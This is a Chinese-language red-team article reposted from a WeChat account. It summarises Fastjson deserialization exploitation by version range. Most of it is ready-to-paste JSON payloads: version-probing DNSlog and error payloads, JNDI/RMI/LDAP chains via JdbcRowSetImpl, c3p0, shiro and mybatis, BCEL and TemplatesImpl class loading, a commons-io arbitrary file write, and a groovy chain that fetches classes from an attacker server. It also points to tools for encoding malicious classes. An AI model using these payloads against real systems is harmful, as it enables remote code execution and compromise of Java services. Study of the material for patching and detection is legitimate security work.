本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承担。请遵守中华人民共和国相关法律法规,切勿利用本公众号发布的技术或工具从事违法犯罪活动。最后,文中提及的图文若无意间导致了侵权问题,请在公众号后台私信联系作者,进行删除操作。
<1.2.24,没有任何限制。
1.2.24-1.2.47,java.lang.Class绕过。
1.2.48-1.2.68,java.lang.AutoCloseable绕过。
1.2.70-1.2.72,无链版本
1.2.73-1.2.80,java.lang.Exception绕过。
1.2.83,无漏洞版本
- 出网环境 Dnslog
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog.com"}}
或
{{"@type":"java.net.URL","val":"http://e63fff7f59.ipv6.1433.eu.org"}:"a"}
- 报错探测版本号
{"@type": "java.lang.AutoCloseable"
- 无报错信息探测版本号
【不报错】1.2.83/1.2.24 【报错】1.2.25-1.2.80
{"zero":{"@type":"java.lang.Exception","@type":"org.XxException"}}
不报错】1.2.24-1.2.68 【报错】1.2.70-1.2.83
{"zero":{"@type":"java.lang.AutoCloseable","@type":"java.io.ByteArrayOutputStream"}}
【不报错】1.2.24-1.2.47 【报错】1.2.48-1.2.83
{"a": {"@type": "java.lang.Class","val": "com.sun.rowset.JdbcRowSetImpl"},"b": {"@type": "com.sun.rowset.JdbcRowSetImpl"}}【
不报错】1.2.24 【报错】1.2.25-1.2.83
{"zero": {"@type": "com.sun.rowset.JdbcRowSetImpl"}}
- Fastjson <1.2.24
JdbcRowSetImpl{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/badClassName", "autoCommit":true}c3p0#JndiRefForwardingDataSource{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"rmi://127.0.0.1:1099/badClassName", "loginTimeout":0}shiro#JndiObjectFactory{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://127.0.0.1:9050/exploit"}shiro#JndiRealmFactory{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":"rmi://127.0.0.1:9050/exploit"}Bel(不出网可用)tomcat7org.apache.tomcat.dbcp.dbcp.BasicDataSourcetomcat8及其以后org.apache.tomcat.dbcp.dbcp2.BasicDataSource{{"x":{"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "恶意类"}}: "x"}com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl条件苛刻,需要代码使用了Feature.SupportNonPublicField,即如下写法:JSON.parseObject(input, Object.class, Feature.SupportNonPublicField)poc:{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["恶意类base64"],'_name':'exp','_tfactory':{ },"_outputProperties":{ }}
- Fastjson<=1.2.47
借助缓存通杀(48版本后缓存默认关闭){{"@type": "java.lang.Class","val": "com.sun.rowset.JdbcRowSetImpl"},{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "rmi://127.0.0.1:1097/Object","autoCommit": true}}poc中第一部分{"@type": "java.lang.Class","val": "com.sun.rowset.JdbcRowSetImpl"}是通过java.lang.Class将JdbcRowSetImpl类加载到缓存。其他利用链同理构造。此方法在1.2.25-1.2.32版本未开启AutoTypeSupport时能利用,开启AutoTypeSupport使用其他方法1.2.25-1.2.41(头加L尾加;):{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://localhost:1389/#Calc", "autoCommit":true}1.2.42(双写L和;):{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1389/#Calc", "autoCommit":true}1.2.25-1.2.43(加[{绕过):{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1389/badNameClass", "autoCommit":true}1.2.25-1.2.45(借助别的依赖的链,如mybatis){"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1389/badNameClass"}}不出网有mybatis依赖时{"@type":"com.alibaba.fastjson.JSONObject","name":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"},"c":{"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource","key":{"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driver":"{恶意类bcel}"}}C3p0 二次反序列化使用yso生成序列化二进制文件,使用c3p0tools生成poc{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:序列化数据hex编码;"}}
- 1.2.48<=Fastjson<=1.2.68
commons-io 2.0 - 2.6:{"x":{"@type":"com.alibaba.fastjson.JSONObject","input":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""aaaaaa...(长度要大于8192,实际写入前8192个字符)"},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"/tmp/pwned","encoding":"UTF-8","append": false},"charsetName":"UTF-8","bufferSize": 1024,"writeImmediately": true},"trigger":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch": true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger2":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch": true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger3":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch": true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"}}}commons-io 2.7 - 2.8.0:{"x":{"@type":"com.alibaba.fastjson.JSONObject","input":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""aaaaaa...(长度要大于8192,实际写入前8192个字符)","start":0,"end":2147483647},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"/tmp/pwned","charsetName":"UTF-8","append": false},"charsetName":"UTF-8","bufferSize": 1024,"writeImmediately": true},"trigger":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch": true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger2":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch": true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger3":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","inputStream":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch": true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"}}
- Fastjson < 1.2.83
groovy依赖(可打76-80版本){"@type":"java.lang.Exception","@type":"org.codehaus.groovy.control.CompilationFailedException","unit":{}}{"@type":"org.codehaus.groovy.control.ProcessingUnit","@type":"org.codehaus.groovy.tools.javac.JavaStubCompilationUnit","config":{"@type":"org.codehaus.groovy.control.CompilerConfiguration","classpathList":"vps地址"}}
vps上放置恶意类和org.codehaus.groovy.transform.ASTTransformation
BCELCodeman(https://github.com/f1tz/BCELCodeman)
一款BCEL编码/解码的小工具。
用法:
Decode:java -jar BCELCodeman.jar d [BCEL_CODE]Encode:java -jar BCELCodeman.jar e [准备的恶意类的.class文件]
将提前准备好的class文件,使用BCELCodeman.jar编码
构造poc并发送
c3p0tools(https://zsxb.oss-cn-shanghai.aliyuncs.com/%E8%B5%A4%E9%9C%84%E6%88%98%E9%98%9F/c3p0tool.jar)
原文始发于微信公众号(Lambda小队):干货!Fastjson打法总结
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论